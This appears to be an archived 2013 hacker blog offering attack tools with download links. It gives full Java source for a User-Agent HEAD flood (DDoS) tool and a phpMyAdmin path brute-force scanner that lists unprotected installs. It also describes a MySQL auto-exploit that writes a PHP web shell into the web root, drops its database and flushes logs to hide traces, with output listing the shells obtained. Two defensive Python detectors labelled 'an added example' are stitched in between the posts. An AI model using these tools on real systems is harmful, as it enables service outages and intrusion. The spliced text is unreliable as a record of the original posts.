Tuesday, February 26, 2013

Thanks for 1337 Views


1337

 

1337 Thanks ;)

1337 hacker (Bewiz) I love bewiz

Monday, February 25, 2013

DDOS-AGENT JAVA


[Image: ddos-website-what-to-do]

Hi all. Today I tested some DDoS attacks on my XAMPP server. After a while I found some Java sample source for DDoS.

I found some GET / HTTP/1.1 TCP SYN attack, but I think it's gay. With the GET / HTTP/1.1, apache.exe got 4% CPU load. If you connect too much, your connection will be killed.

After a while I got an idea: why not flood the server with GET HEAD + set User-Agent? After 10 minutes of coding, DDoS-Agent was born.

Here is some proof:

Tested it on a friend's CPU; my CPU is too slow for it (AMD X2 2600 ghz, 2gb RAM).

Friend's system: AMD X6 3500ghz

Friend's RAM: 16gb

[Image: untitled]

Started a DDoS attack 6 times on the XAMPP server with default conf.

ApacheHttpServer.exe goes to 60-80%. With a bigger User-Agent buffer you can make up to 15mb/s write speed on access.log. I used a small one, just 1mbs.

Download :

http://www.mirrorupload.net/file/IRXHYSDS/#!ddos.exe

 

Source:

Dos.java

package com;
import java.io.BufferedWriter;
import java.io.IOException;
import java.io.OutputStreamWriter;
import java.net.Socket;
import java.util.Scanner;


/**
* Created by Simple IDEA.
* User: cr4shyyyyy
* Date: 23-02-2013
* Time: 21:10:28
*/
public class dos extends Socket implements Runnable {
static dos _instance = new dos();

public static void main(String[] args) {
//for (int i = 0; i < 2; i++)
new Thread(_instance).start();
}

public void run() {
Scanner scanner = new Scanner(System.in);
System.out.println("Welcome to User-Agent-DDoS by cr4shyyy : ");
System.out.println("_________________________________");
System.out.println("|.--------_--_------------_--__--.|");
System.out.println("|| Security-is-just-an-Illusion||");
System.out.println(";;`,_ by cr4shyyy __ ,:|");
System.out.println("((_(-,-----------.-.----------.-.)`)");
System.out.println("__ ) ,' `. _/");
System.out.println(": : |_________| : :");
System.out.println("|-'| ,'-.-.--.-.`. |`-|");
System.out.println("|_.| (( (* )(* ))) |._|");
System.out.println("| | `.-`-'--`-'.' | |");
System.out.println("|-'| | ,-.-.-. | |._|");
System.out.println("| | |(|-|-|-|)| | |");
System.out.println(":,': |_`-'-'-'_| ;`.;");
System.out.println(" ,' `. /._/");
System.out.println(" `._ ________________,' /");
System.out.println(" : ___________ : ,'");
System.out.println(" `.| | | | |,'");
System.out.println(" `.| | g0tr00t ? | | |");
System.out.println(" | | | |");
System.out.println("Hello nobody. Tonight we have a very special g33k Presentation.");
System.out.println("So, kick back and stretch your sack.");
System.out.println(" ");
System.out.println(" +++The Mentor+++ ");
System.out.println("We explore... and you call us criminals.");
System.out.println("We seek after knowledge... and you call us criminals.");
System.out.println("We exist without skin color, without nationality, without religious bias... and you call us criminals.");
System.out.println("You build atomic bombs, you wage wars, you murder, cheat,");
System.out.println("and lie to us and try to make us believe it's for our own good, yet we're the criminals.");
System.out.println(" ");
System.out.println("Please Enter Ip to UserAgent-DDoS : ");
String eingabe = scanner.nextLine();
String TARGET = eingabe;
if(eingabe == null || eingabe.length() == 0) {
System.out.println("Enter range n000b ........");
}

for (int i = 1; i < 1000000; i++) {
if ((checkshell.exists("http://"+TARGET+"")) == true) {
System.out.println("Fucked You " + i+" Times with " +i+" Connection !!!");
}
else{
if ((checkshell.exists("http://"+TARGET+"")) == false) {
System.out.println("Error after " +i+" Connection !!!");
}
}

}
}

public static void sendRawLine(String text, Socket sock) {
try {
BufferedWriter out = new BufferedWriter(new OutputStreamWriter(sock.getOutputStream()));
out.write(text + " ");
out.flush();
} catch (IOException ex) {
System.out.println("Bitch Offline ....");
//ex.printStackTrace();
}
}
}


checkshell.java



package com;
import java.net.*;

public class checkshell {
/**
* Created by Simple IDEA.
* User: cr4shyyyyy
* Date: 23-02-2013
* Time: 21:10:28
*/
public static void mainshellcheck(String s[]) {
/*
output :
true
false
*/
}

public static boolean exists(String URLName){
String evilPayload = org.apache.commons.lang3.RandomStringUtils.randomAlphanumeric(1*3*3*7);
//System.out.println(evilPayload);


String userAgentPayload = "UserAgentDDOS by cr4shhyyy from http://security-is-just-an-illusion.blogspot.de/"+evilPayload;
int TIMEOUT_VALUE = 0;
try {
HttpURLConnection.setFollowRedirects(false);
HttpURLConnection con =(HttpURLConnection) new URL(URLName).openConnection();
con.setInstanceFollowRedirects(false);
con.setConnectTimeout(TIMEOUT_VALUE);
con.setReadTimeout(TIMEOUT_VALUE);
con.setConnectTimeout(TIMEOUT_VALUE);
con.setRequestMethod("HEAD");
con.addRequestProperty("User-Agent", userAgentPayload);
con.disconnect();
return (con.getResponseCode() == HttpURLConnection.HTTP_OK);
}



catch (Exception e) {
System.out.println("Bitch Offline ....");
//e.printStackTrace();
return false;
}
}
}


Use it for Personal use or study purposes.
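
An added example (not part of the original post or the author's code): a log-side detector for the traffic this tool produces, namely bursts of HEAD requests from one client where nearly every request carries a different User-Agent that shares one fixed prefix. The function names, thresholds and sample log lines are assumptions constructed for illustration; the input is Apache's combined log format.

```python
import os
import random
import re
import string
from collections import defaultdict
from datetime import datetime, timedelta

# Apache "combined" format: host ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)


def parse_line(line):
    """Return a dict for one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.strptime(ev["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return ev


def densest_window(events, window):
    """Largest run of time-sorted events that fits inside `window` (two-pointer scan)."""
    best, start = [], 0
    for end in range(len(events)):
        while events[end]["ts"] - events[start]["ts"] > window:
            start += 1
        if end - start + 1 > len(best):
            best = events[start:end + 1]
    return best


def find_ua_floods(lines, window=timedelta(seconds=10), min_requests=20,
                   min_distinct_ratio=0.9):
    """Flag clients that send a burst of HEAD requests with ever-changing User-Agents."""
    by_ip = defaultdict(list)
    for line in lines:
        ev = parse_line(line)
        if ev and ev["method"] == "HEAD":
            by_ip[ev["ip"]].append(ev)

    findings = []
    for ip, events in by_ip.items():
        events.sort(key=lambda e: e["ts"])
        burst = densest_window(events, window)
        if len(burst) < min_requests:
            continue
        uas = [e["ua"] for e in burst]
        if len(set(uas)) / len(uas) < min_distinct_ratio:
            continue  # a health checker also bursts HEAD, but keeps one stable User-Agent
        findings.append({
            "ip": ip,
            "requests": len(burst),
            "distinct_user_agents": len(set(uas)),
            "common_prefix": os.path.commonprefix(uas),  # fixed part before the random padding
            "ua_bytes_logged": sum(len(u) for u in uas),  # log growth caused by the header alone
        })
    return findings


# ---- constructed sample data (not real traffic) ----
# Fixed User-Agent prefix as it appears in the post's source; 63 random characters follow it.
FLOOD_PREFIX = ("UserAgentDDOS by cr4shhyyy from "
                "http://security-is-just-an-illusion.blogspot.de/")


def build_sample_log():
    rng = random.Random(0)
    t0 = datetime(2013, 2, 25, 21, 10, 28)

    def line(ip, offset_ms, method, path, ua):
        ts = (t0 + timedelta(milliseconds=offset_ms)).strftime("%d/%b/%Y:%H:%M:%S +0100")
        return f'{ip} - - [{ts}] "{method} {path} HTTP/1.1" 200 - "-" "{ua}"'

    lines = []
    for i in range(30):   # flooding client: new padded User-Agent on every request
        pad = "".join(rng.choices(string.ascii_letters + string.digits, k=63))
        lines.append(line("203.0.113.7", i * 100, "HEAD", "/", FLOOD_PREFIX + pad))
    for i in range(25):   # health checker: same burst rate, one User-Agent
        lines.append(line("192.0.2.5", i * 200, "HEAD", "/", "uptime-check/1.0"))
    for i in range(5):    # ordinary browser
        lines.append(line("198.51.100.20", i * 1500, "GET", "/index.html",
                          "Mozilla/5.0 (X11; Linux x86_64)"))
    return lines


if __name__ == "__main__":
    for finding in find_ua_floods(build_sample_log()):
        print(finding)
```

On the server side, Apache's `LimitRequestFieldSize` directive bounds how large a single request header such as User-Agent may be, which caps the per-request access.log growth the post describes.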

Saturday, February 23, 2013

PhpMyAdmin-Directory Buster v1.0


I was a little bored, and I thought I would write a path brute-force tool for phpMyAdmin.

All hackers know it: where the hell is the next target? The only way to find a target is scanning your local network ;)

Billions of servers are running phpMyAdmin; you only need to find them. Google can help you find some interfaces with dorks, but you can do it by yourself.

I'm a n00by, don't blame me for my coding skill... I never learned any coding language. I just learn from Google & friends, thanks to the people who fill the Internet.

Here is my Paint PoC:

[Image: next]

After a week I think it's done. I hope it is ;)

Download Compiled .exe & .jar :

http://www.mirrorupload.net/file/1GLG7SAF/#!PhpMyAdmin-Directory_Buster.rar

 

Source Code :

scanner.java

package crashyyy;

import java.io.BufferedReader;
import java.io.DataInputStream;
import java.io.File;
import java.io.FileInputStream;
import java.io.FileNotFoundException;
import java.io.FileWriter;
import java.io.IOException;
import java.io.InputStreamReader;
import java.net.HttpURLConnection;
import java.net.InetSocketAddress;
import java.net.Socket;
import java.net.SocketAddress;
import java.net.URL;
import crashyyy.AePlayWave;

import crashyyy.checkshell;

public class scanner {

/**
* @param args
*/
public static void main(String[] args) {
int TIMEOUT_VALUE = 4000;
String userAgent = "PhpMyAdmin Hunter by cr4shyyy from http://security-is-just-an-illusion.blogspot.de";

try{
FileInputStream dirstream123 = new FileInputStream("ip.txt");
DataInputStream dir23 = new DataInputStream(dirstream123);
BufferedReader b123 = new BufferedReader(new InputStreamReader(dir23));
String strLine123;
while ((strLine123 = b123.readLine()) != null) {
String ips = strLine123;
Socket s = new Socket();
try {
int port = 80;

FileWriter securewriter;
File file;
file = new File("secure.txt");
securewriter = new FileWriter(file ,true);

FileWriter insecurewriter;
File file0;
file0 = new File("insecure.txt");
insecurewriter = new FileWriter(file0 ,true);


System.out.println("---------------------------------------------------");
System.out.println("[inFoo] Testing Port " + port +" From IP "+ips);

SocketAddress sockaddr = new InetSocketAddress(ips, port);
s.connect(sockaddr, 100);
s.setReceiveBufferSize(1024);
s.setSendBufferSize(1024);

System.out.println("[inFoo] >>> Port OK <<<");

FileInputStream dirstream1233 = new FileInputStream("paths.txt");
DataInputStream dir233 = new DataInputStream(dirstream1233);
BufferedReader b1233 = new BufferedReader(new InputStreamReader(dir233));
String strLine1233;
while ((strLine1233 = b1233.readLine()) != null) {
String paths = strLine1233;

System.out.println("[inFoo] Start PhpMyadmin Check "+"http://"+ips+""+paths+"sql.php");
if ((checkshell.exists("http://"+ips+""+paths+"sql.php")) == true) {
String w00t = "http://"+ips+""+paths+"sql.php";
try{
HttpURLConnection con =
(HttpURLConnection) new URL(w00t).openConnection();
con.setConnectTimeout(TIMEOUT_VALUE);
con.setReadTimeout(TIMEOUT_VALUE);
con.addRequestProperty("User-Agent", userAgent);
BufferedReader in = new BufferedReader(new InputStreamReader(con.getInputStream()));
con.connect();
while ((w00t = in.readLine()) != null)
if (w00t.contains("var input_username = document.getElementById('input_username')")){
System.out.println("---------------------------------------------------");
System.out.println("[inFoo] By Security-is-just-an-illusion.blogspot.de");
System.out.println("[inFoo] Phpmyadmin Found : "+"http://"+ips+""+""+paths+"sql.php");
System.out.println("[inFoo] Secure Login Found");
System.out.println("---------------------------------------------------");
con.setConnectTimeout(TIMEOUT_VALUE);
con.setReadTimeout(TIMEOUT_VALUE);
securewriter.write("http://"+ips+""+""+paths+"sql.php");
//securewriter.write(w00t);
securewriter.write(System.getProperty("line.separator"));
AePlayWave aw = new AePlayWave( "found.wav" );
aw.start();
securewriter.flush();
securewriter.close();
break;
}
else{
if (w00t.contains("var uname = document.forms['login_form'].elements['pma_username']")){
System.out.println("---------------------------------------------------");
System.out.println("[inFoo] By Security-is-just-an-illusion.blogspot.de");
System.out.println("[inFoo] Phpmyadmin Found : "+"http://"+ips+""+""+paths+"sql.php");
System.out.println("[inFoo] Secure Login Found");
System.out.println("---------------------------------------------------");
con.setConnectTimeout(TIMEOUT_VALUE);
con.setReadTimeout(TIMEOUT_VALUE);
securewriter.write("http://"+ips+""+""+paths+"sql.php");
//securewriter.write(w00t);
securewriter.write(System.getProperty("line.separator"));
AePlayWave aw = new AePlayWave( "found.wav" );
aw.start();
securewriter.flush();
securewriter.close();
break;
}
else{
if (w00t.contains("<!-- Login form -->")){
System.out.println("---------------------------------------------------");
System.out.println("[inFoo] By Security-is-just-an-illusion.blogspot.de");
System.out.println("[inFoo] Phpmyadmin Found : "+"http://"+ips+""+""+paths+"sql.php");
System.out.println("[inFoo] Secure Login Found");
System.out.println("---------------------------------------------------");
con.setConnectTimeout(TIMEOUT_VALUE);
con.setReadTimeout(TIMEOUT_VALUE);
securewriter.write("http://"+ips+""+""+paths+"sql.php");
//securewriter.write(w00t);
securewriter.write(System.getProperty("line.separator"));
AePlayWave aw = new AePlayWave( "found.wav" );
aw.start();
securewriter.flush();
securewriter.close();
break;
}
else{
if (w00t.contains("<!-- MySQL and phpMyAdmin related links -->")){
System.out.println("---------------------------------------------------");
System.out.println("[inFoo] By Security-is-just-an-illusion.blogspot.de");
System.out.println("[inFoo] Phpmyadmin Found : "+"http://"+ips+""+""+paths+"sql.php");
System.out.println("[inFoo] InSecure Login Found");
System.out.println("---------------------------------------------------");
con.setConnectTimeout(TIMEOUT_VALUE);
con.setReadTimeout(TIMEOUT_VALUE);
insecurewriter.write("http://"+ips+""+""+paths+"sql.php");
insecurewriter.write(System.getProperty("line.separator"));
AePlayWave aw = new AePlayWave( "found.wav" );
aw.start();
insecurewriter.flush();
insecurewriter.close();
break;
}
else{
if (w00t.contains("<!-- phpMyAdmin related links -->")){
System.out.println("---------------------------------------------------");
System.out.println("[inFoo] By Security-is-just-an-illusion.blogspot.de");
System.out.println("[inFoo] Phpmyadmin Found : "+"http://"+ips+""+""+paths+"sql.php");
System.out.println("[inFoo] InSecure Login Found");
System.out.println("---------------------------------------------------");
con.setConnectTimeout(TIMEOUT_VALUE);
con.setReadTimeout(TIMEOUT_VALUE);
insecurewriter.write("http://"+ips+""+""+paths+"sql.php");
insecurewriter.write(System.getProperty("line.separator"));
AePlayWave aw = new AePlayWave( "found.wav" );
aw.start();
insecurewriter.flush();
insecurewriter.close();
break;
}
else{
if (w00t.contains("Forbidden")){
System.out.println("---------------------------------------------------");
System.out.println("[inFoo] "+w00t+" 403 Forbidden Skip");
con.setConnectTimeout(TIMEOUT_VALUE);
con.setReadTimeout(TIMEOUT_VALUE);
}
else{
if (w00t.contains("404")){
System.out.println("---------------------------------------------------");
System.out.println("[inFoo] "+w00t+" 404 Not Found Skip");
con.setConnectTimeout(TIMEOUT_VALUE);
con.setReadTimeout(TIMEOUT_VALUE);
}
FileWriter writer;
File file9;
file9 = new File("debug.txt");
writer = new FileWriter(file9 ,true);
writer.write("---------------------------------------------------");
writer.write(System.getProperty("line.separator"));
writer.write("http://"+ips+""+""+paths+"sql.php");
writer.write(System.getProperty("line.separator"));
writer.write(w00t);
writer.write(System.getProperty("line.separator"));
writer.write("---------------------------------------------------");
writer.write(System.getProperty("line.separator"));
writer.flush();
writer.close();
}
}
}
}
}
}
} finally {
}
}
}
} catch (IOException e) {
//System.out.println("---------------------------------------------------");
System.out.println("[inFoo] OFFLINE !!! SKIP !!! ");
//System.out.println(s.getSoTimeout());
System.out.println("---------------------------------------------------");
} finally {
if( s != null){
try {
s.close();
} catch (IOException e) {
throw new RuntimeException("You should handle this error." , e);
}
}//end try

//END
}
}

} catch (FileNotFoundException e1) {
// TODO Auto-generated catch block
e1.printStackTrace();
} catch (IOException e) {
// TODO Auto-generated catch block
e.printStackTrace();
}finally{
System.out.println("[inFoo] Goodbye by http://security-is-just-an-illusion.blogspot.de!");
System.out.println("---------------------------------------------------");
}
}
}


checkshell.java



package crashyyy;
import java.net.*;
import java.util.Properties;

public class checkshell {

public static void mainshellcheck(String s[]) {
/*
output :
true
false
*/
}

public static boolean exists(String URLName){
String userAgent = "Google.com CrawlBot";
int TIMEOUT_VALUE = 2000;
try {
HttpURLConnection.setFollowRedirects(false);
HttpURLConnection con =
(HttpURLConnection) new URL(URLName).openConnection();
con.setInstanceFollowRedirects(false);
con.setConnectTimeout(TIMEOUT_VALUE);
con.setReadTimeout(TIMEOUT_VALUE);
con.setConnectTimeout(2000); //set timeout to 2 seconds
con.setRequestMethod("HEAD");
con.addRequestProperty("User-Agent", userAgent);
con.disconnect();
return (con.getResponseCode() == HttpURLConnection.HTTP_OK);
}

catch (Exception e) {
//e.printStackTrace();
return false;
}
}
}


AePlayWave.java // Plays a sound file if a result is found.



package crashyyy;
import java.io.File;
import java.io.IOException;
import javax.sound.sampled.AudioFormat;
import javax.sound.sampled.AudioInputStream;
import javax.sound.sampled.AudioSystem;
import javax.sound.sampled.DataLine;
import javax.sound.sampled.FloatControl;
import javax.sound.sampled.LineUnavailableException;
import javax.sound.sampled.SourceDataLine;
import javax.sound.sampled.UnsupportedAudioFileException;

public class AePlayWave extends Thread {

private String filename;

private Position curPosition;

private final int EXTERNAL_BUFFER_SIZE = 524288; // 512 KB

enum Position {
LEFT, RIGHT, NORMAL
};

public AePlayWave(String wavfile) {
filename = wavfile;
curPosition = Position.NORMAL;
}

public AePlayWave(String wavfile, Position p) {
filename = wavfile;
curPosition = p;
}

public void run() {

File soundFile = new File(filename);
if (!soundFile.exists()) {
System.err.println("Wave file not found: " + filename);
return;
}

AudioInputStream audioInputStream = null;
try {
audioInputStream = AudioSystem.getAudioInputStream(soundFile);
} catch (UnsupportedAudioFileException e1) {
e1.printStackTrace();
return;
} catch (IOException e1) {
e1.printStackTrace();
return;
}

AudioFormat format = audioInputStream.getFormat();
SourceDataLine auline = null;
DataLine.Info info = new DataLine.Info(SourceDataLine.class, format);

try {
auline = (SourceDataLine) AudioSystem.getLine(info);
auline.open(format);
} catch (LineUnavailableException e) {
e.printStackTrace();
return;
} catch (Exception e) {
e.printStackTrace();
return;
}

if (auline.isControlSupported(FloatControl.Type.PAN)) {
FloatControl pan = (FloatControl) auline
.getControl(FloatControl.Type.PAN);
if (curPosition == Position.RIGHT)
pan.setValue(1.0f);
else if (curPosition == Position.LEFT)
pan.setValue(-1.0f);
}

auline.start();
int nBytesRead = 0;
byte[] abData = new byte[EXTERNAL_BUFFER_SIZE];

try {
while (nBytesRead != -1) {
nBytesRead = audioInputStream.read(abData, 0, abData.length);
if (nBytesRead >= 0)
auline.write(abData, 0, nBytesRead);
}
} catch (IOException e) {
e.printStackTrace();
return;
} finally {
auline.drain();
auline.close();
}

}
}








Use it for Personal use or study purposes.
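
An added example (not part of the original post or the author's code): the scanner above writes a URL to insecure.txt when the response carries phpMyAdmin page markers rather than a login form. Assuming that corresponds to phpMyAdmin serving its interface without prompting for credentials, the server-side settings to audit are `auth_type`, `password` and `AllowNoPassword` in `config.inc.php`. The function names and the sample configuration are constructed for illustration.

```python
import re

# One "$cfg['Servers'][$i]['key'] = value;" assignment; value is quoted text or a bare token.
ASSIGN_RE = re.compile(
    r"""^\s*\$cfg\['Servers'\]\[\$i\]\['(?P<key>\w+)'\]\s*=\s*
        (?:'(?P<sq>(?:[^'\\]|\\.)*)'|"(?P<dq>(?:[^"\\]|\\.)*)"|(?P<raw>[^;]+?))\s*;""",
    re.VERBOSE,
)
INC_RE = re.compile(r"^\s*\$i\s*\+\+\s*;")          # "$i++;" starts the next server block
SET_RE = re.compile(r"^\s*\$i\s*=\s*(\d+)\s*;")     # "$i = 0;" resets the index


def _value(m):
    if m.group("sq") is not None:
        return m.group("sq")
    if m.group("dq") is not None:
        return m.group("dq")
    raw = m.group("raw").strip()
    if raw.lower() in ("true", "false"):
        return raw.lower() == "true"
    return raw


def parse_servers(php_text):
    """Collect per-server settings, skipping // and /* */ commented-out lines."""
    servers, idx, in_block = {}, 0, False
    for line in php_text.splitlines():
        stripped = line.strip()
        if in_block:
            in_block = "*/" not in stripped
            continue
        if stripped.startswith("/*"):
            in_block = "*/" not in stripped
            continue
        if INC_RE.match(line):
            idx += 1
            continue
        m = SET_RE.match(line)
        if m:
            idx = int(m.group(1))
            continue
        m = ASSIGN_RE.match(line)  # anchored at "$cfg", so "// $cfg..." never matches
        if m:
            servers.setdefault(idx, {})[m.group("key")] = _value(m)
    return servers


def audit(php_text):
    """Return (server_index, finding) pairs for settings that skip the login prompt."""
    findings = []
    for idx, cfg in sorted(parse_servers(php_text).items()):
        # 'cookie' is the default in current phpMyAdmin documentation when unset.
        if cfg.get("auth_type", "cookie") == "config":
            findings.append((idx, "AUTH_TYPE_CONFIG"))       # credentials stored, no prompt
            if cfg.get("password", "") == "":
                findings.append((idx, "STORED_EMPTY_PASSWORD"))
        if cfg.get("AllowNoPassword") is True:
            findings.append((idx, "ALLOW_NO_PASSWORD"))
    return findings


# Constructed sample: server 1 is a passwordless development setup, server 2 prompts for login.
SAMPLE_CONFIG = """<?php
$i = 0;
/* Server 1 */
$i++;
$cfg['Servers'][$i]['auth_type'] = 'config';
$cfg['Servers'][$i]['user'] = 'root';
$cfg['Servers'][$i]['password'] = '';
$cfg['Servers'][$i]['AllowNoPassword'] = true;
// $cfg['Servers'][$i]['auth_type'] = 'cookie';
/* Server 2 */
$i++;
$cfg['Servers'][$i]['auth_type'] = "cookie";
$cfg['Servers'][$i]['AllowNoPassword'] = FALSE;
"""

if __name__ == "__main__":
    for server, finding in audit(SAMPLE_CONFIG):
        print(f"server {server}: {finding}")
```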

IpRange-Gen-Agent


Here is my next simple release, IpRange-Gen-Agent. Sometimes you need to generate some IP range. If not, you don't need it ;)

Download Compiled Exe:

http://www.directmirror.com/files/0AEGWHLT

http://www.mirrorupload.net/file/IWPJRHWC/#!iprange-gen.rar

 

main.java

package com;

import java.io.File;
import java.io.FileWriter;
import java.util.Scanner;

/**
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS''
* AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
* TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
* PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS
* BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
* CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
* SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
* INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
* CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
* ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
* POSSIBILITY OF SUCH DAMAGE.
*/

/**
* This class contains methods to generate IP Address(IPV4) Sequence.
*/
public class main {

/**
* Program starts here
*
* @param args
* @throws Exception
*/
public static void main(String[] args) throws Exception {
Scanner scanner = new Scanner(System.in);
System.out.println("Welcome to IpRange-Gen-Agent by cr4shyyy : ");
System.out.println("_________________________________");
System.out.println("|.--------_--_------------_--__--.|");
System.out.println("|| Security-is-just-an-Illusion||");
System.out.println(";;`,_ by cr4shyyy __ ,:|");
System.out.println("((_(-,-----------.-.----------.-.)`)");
System.out.println("__ ) ,' `. _/");
System.out.println(": : |_________| : :");
System.out.println("|-'| ,'-.-.--.-.`. |`-|");
System.out.println("|_.| (( (* )(* ))) |._|");
System.out.println("| | `.-`-'--`-'.' | |");
System.out.println("|-'| | ,-.-.-. | |._|");
System.out.println("| | |(|-|-|-|)| | |");
System.out.println(":,': |_`-'-'-'_| ;`.;");
System.out.println(" ,' `. /._/");
System.out.println(" `._ ________________,' /");
System.out.println(" : ___________ : ,'");
System.out.println(" `.| | | | |,'");
System.out.println(" `.| | g0tr00t ? | | |");
System.out.println(" | | | |");
System.out.println("Hello nobody. Tonight we have a very special g33k Presentation.");
System.out.println("So, kick back and stretch your sack.");
System.out.println(" ");
System.out.println(" +++The Mentor+++ ");
System.out.println("We explore... and you call us criminals.");
System.out.println("We seek after knowledge... and you call us criminals.");
System.out.println("We exist without skin color, without nationality, without religious bias... and you call us criminals.");
System.out.println("You build atomic bombs, you wage wars, you murder, cheat,");
System.out.println("and lie to us and try to make us believe it's for our own good, yet we're the criminals.");
System.out.println(" ");
System.out.println("Please Enter Ip Range : ");
System.out.println("Enter '127.0.0.1' its gen IP-Range to '127.255.255.255: ");
String eingabe = scanner.nextLine();

main ipGen = new main();
String ipStartingSeq = ""+ eingabe;
if(eingabe == null || eingabe.length() == 0) { /* DO STUFF */
System.out.println("Enter range n000b ........");
}
else{
// 256*256*256 = 16777216 Ips 1 FullRange
int numberOfIP = 16777216;
ipGen.generateNextIPSequence(ipStartingSeq, numberOfIP);
scanner.close();
}

}

public void generateNextIPSequence(String address, int count)
throws Exception {
String nextIpAddress = address;
for (int i = 0; i < count; i++) {
System.out.println(nextIpAddress);
//File writer for Ips
FileWriter writer;
File file;
file = new File("ip.txt");
writer = new FileWriter(file ,true);
writer.write(""+nextIpAddress);
writer.write(System.getProperty("line.separator"));
writer.flush();
writer.close();
nextIpAddress = getNextIPAddress(nextIpAddress);

}
}

public String[] getPartsOfIpAddress(String ipAddress) {
String[] elements = ipAddress.split("\\.");

return elements;
}

public String getNextIPAddress(String ipAddress) throws Exception {

String[] elements = getPartsOfIpAddress(ipAddress);
if (elements != null && elements.length == 4) {
Integer part1 = Integer.parseInt(elements[0]);
Integer part2 = Integer.parseInt(elements[1]);
Integer part3 = Integer.parseInt(elements[2]);
Integer part4 = Integer.parseInt(elements[3]);
if (part4 < 255) {
String ip = part1 + "." + part2 + "." + part3 + "." + (++part4);
return ip;
} else if (part4 == 255) {
if (part3 < 255) {
String ip = part1 + "." + part2 + "." + (++part3) + "."
+ (0);
return ip;
} else if (part3 == 255) {
if (part2 < 255) {
String ip = part1 + "." + (++part2) + "." + (0) + "."
+ (0);
return ip;
} else if (part2 == 255) {
if (part1 < 255) {
String ip = (++part1) + "." + (0) + "." + (0) + "."
+ (0);
return ip;
} else if (part1 == 255) {
throw new Exception("IP Range Exceeded -> "+ipAddress);
}
}
}
}
}

return null;
}
}


 



Have pfun …….

Saturday, February 9, 2013

Mysql-Pwn-Agent Beta


Hello and good morning to all readers. I got up quite early today, and in fact I slept very late last night. Argh...

But I'm done with Mysql-Pwn-Agent Beta.

Mysql Pwn Agent is an auto-exploit for MySQL + any Windows HTTP server; I use XAMPP for testing.

Here is my simple PoC (proof of concept):

Paint, wtf ;)

[Image: untitled]

After some days of playing with Java JDBC and XAMPP's MySQL and Apache, I finished writing the exploit. Thanks to Yeohwa for some hints.

Here are some screenshots.

We need a test server: start XAMPP + Apache web server + MySQL database.

[Image: xampp]

Get the exploit and add some IPs to scan.txt. Add your PHP shell code, base64-encoded, to shell.txt. Start the exploit. You can use php/reverse/metapreter/ from Metasploit to get a reverse shell, but it sucks with my online check-shell class because the PHP Metasploit reverse shell never stops loading. Better to use any PHP shell or my simple upload script.

[Image: input]

The POC-Exploit:

[Image: exploit]

Exploit output if it fails. It creates a random database + tables every time. It uses dir.txt to brute-force Apache's htdocs root dir to upload the shell, and checks whether the shell is online.

 

#######################################################################
###########################by cr4shyyy#################################
#######################################################################
Connecting to database...localhost
Creating database rcdmiwb
Creating Table rcdmiwb
rcdmiwb Table created successfully...
rcdmiwb Connecting to database rcdmiwb Again...
Insert Shell Into Table rcdmiwb...
Creating outfile to hdd...
SQLState: HY000
Error Code: 1
Message: Can't create/write to file 'C:\mysql-admin\rcdmiwb.php' (Errcode: 2)
Goodbye by http://security-is-just-an-illusion.blogspot.de!
#######################################################################
###########################by cr4shyyy#################################
#######################################################################
Connecting to database...127.0.0.1
Creating database bffatwe
Creating Table bffatwe
bffatwe Table created successfully...
bffatwe Connecting to database bffatwe Again...
Insert Shell Into Table bffatwe...
Creating outfile to hdd...
SQLState: HY000
Error Code: 1
Message: Can't create/write to file 'C:\mysql-admin\bffatwe.php' (Errcode: 2)
Goodbye by http://security-is-just-an-illusion.blogspot.de!
#######################################################################
###########################by cr4shyyy#################################
#######################################################################






Exploit output if it wins.



#######################################################################
###########################by cr4shyyy#################################
#######################################################################
Connecting to database...localhost
Creating database tdduvjs
Creating Table tdduvjs
tdduvjs Table created successfully...
tdduvjs Connecting to database tdduvjs Again...
Insert Shell Into Table tdduvjs...
Creating outfile to hdd...
Upload /xampp/htdocs/tdduvjs.php Done...
Successfully Exploit Done ...
Connecting to database tdduvjs Again...
Drop Database tdduvjs...
Successfully Dropped tdduvjs Table ...
Flush logs ...
Successfully FLUSH Logs Done ...
#######################################################################
#######################################################################
By Security-is-just-an-illusion.blogspot.de
Your Shell : http://localhost/tdduvjs.php
#######################################################################
#######################################################################
Goodbye by http://security-is-just-an-illusion.blogspot.de!
#######################################################################
###########################by cr4shyyy#################################
#######################################################################
Connecting to database...127.0.0.1
Creating database memaarx
Creating Table memaarx
memaarx Table created successfully...
memaarx Connecting to database memaarx Again...
Insert Shell Into Table memaarx...
Creating outfile to hdd...
Upload /xampp/htdocs/memaarx.php Done...
Successfully Exploit Done ...
Connecting to database memaarx Again...
Drop Database memaarx...
Successfully Dropped memaarx Table ...
Flush logs ...
Successfully FLUSH Logs Done ...
#######################################################################
#######################################################################
By Security-is-just-an-illusion.blogspot.de
Your Shell : http://127.0.0.1/memaarx.php
#######################################################################
#######################################################################
Goodbye by http://security-is-just-an-illusion.blogspot.de!


Now it finds the root doc and we win and got your shells ready ;)



Look into results.txt there are the saved shells.



#######################################################################
By http://Security-is-just-an-illusion.blogspot.de
Your Shell : http://localhost/tdduvjs.php
Shell Date: 09.02.2013 12:15
#######################################################################

#######################################################################
By http://Security-is-just-an-illusion.blogspot.de
Your Shell : http://127.0.0.1/memaarx.php
Shell Date: 09.02.2013 12:15
#######################################################################


The result with the base64-encoded upload script:

[Image: uploadscript]

